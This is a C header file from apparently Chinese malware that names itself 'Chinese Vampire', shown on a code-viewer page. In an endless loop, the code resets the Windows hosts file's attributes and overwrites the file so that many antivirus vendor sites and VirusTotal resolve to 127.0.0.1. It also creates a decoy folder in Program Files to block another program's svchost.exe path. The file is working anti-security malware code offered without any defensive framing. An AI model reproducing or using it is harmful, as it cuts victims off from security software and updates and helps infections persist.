📄 mianyi.h
字号:
//免疫.h
//通过host方式免疫杀毒软件
#include "head.h"
DWORD WINAPI mianyi(LPVOID lpParameter)
{
while (1)
{
Sleep(1000);
char ProgramFilePath[MAX_PATH];
char ProgramFilePath1[MAX_PATH];
char host[MAX_PATH];
ExpandEnvironmentStrings("%ProgramFiles%",ProgramFilePath,255); //得到安装程序目录
GetSystemDirectory(host,MAX_PATH); //得到host目录,免疫杀毒软件
//----------------该回hosts文件属性的
strcat(host,"\\drivers\\etc\\hosts");
SetFileAttributes(host,FILE_ATTRIBUTE_NORMAL);
//----------------免疫绿鹰的垃圾样本
strcpy(ProgramFilePath1,ProgramFilePath);
strcat(ProgramFilePath1,"\\绿鹰PC万能精灵");
CreateDirectory(ProgramFilePath1,NULL);
strcat(ProgramFilePath,"\\绿鹰PC万能精灵\\svchost.exe");
CreateDirectory(ProgramFilePath,NULL);
FILE *file;
file=fopen(host,"w");
if (!file)
{
return 1;
}
else
{
char mianyi[MAX_PATH]="# ****以下为中华吸血鬼免疫杀毒软件的****\r\n"
"127.0.0.1 www.360.cn\r\n127.0.0.1 www.360safe.cn\r\n"
"127.0.0.1 www.360safe.com\r\n127.0.0.1 www.chinakv.com\r\n"
"127.0.0.1 www.rising.com.cn\r\n127.0.0.1 rising.com.cn\r\n"
"127.0.0.1 dl.jiangmin.com\r\n127.0.0.1 jiangmin.com\r\n";
char mianyi2[MAX_PATH]="127.0.0.1 www.jiangmin.com\r\n"
"127.0.0.1 www.duba.net\r\n"
"127.0.0.1 www.eset.com.cn\r\n127.0.0.1 www.nod32.com\r\n"
"127.0.0.1 shadu.duba.net\r\n127.0.0.1 union.kingsoft.com\r\n"
"127.0.0.1 www.kaspersky.com.cn\r\n127.0.0.1 kaspersky.com.cn\r\n127.0.0.1 virustotal.com\r\n";
char mianyi3[MAX_PATH]="127.0.0.1 www.kaspersky.com\r\n127.0.0.1 60.210.176.251\r\n"
"127.0.0.1 www.cnnod32.cn\r\n127.0.0.1 www.lanniao.org\r\n127.0.0.1 www.nod32club.com\r\n"
"127.0.0.1 www.dswlab.com\r\n127.0.0.1 bbs.sucop.com\r\n"
"127.0.0.1 www.virustotal.com\r\n127.0.0.1 tool.ikaka.com\r\n";
char mianyi4[MAX_PATH]="127.0.0.0 360.qihoo.com\r\n127.0.0.1 qihoo.com\r\n"
"127.0.0.1 www.qihoo.com\r\n127.0.0.1 www.qihoo.cn\r\n127.0.0.1 124.40.51.17";
fputs(mianyi,file);
fputs(mianyi2,file);
fputs(mianyi3,file);
fputs(mianyi4,file);
fclose(file);
}
}
return 1;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -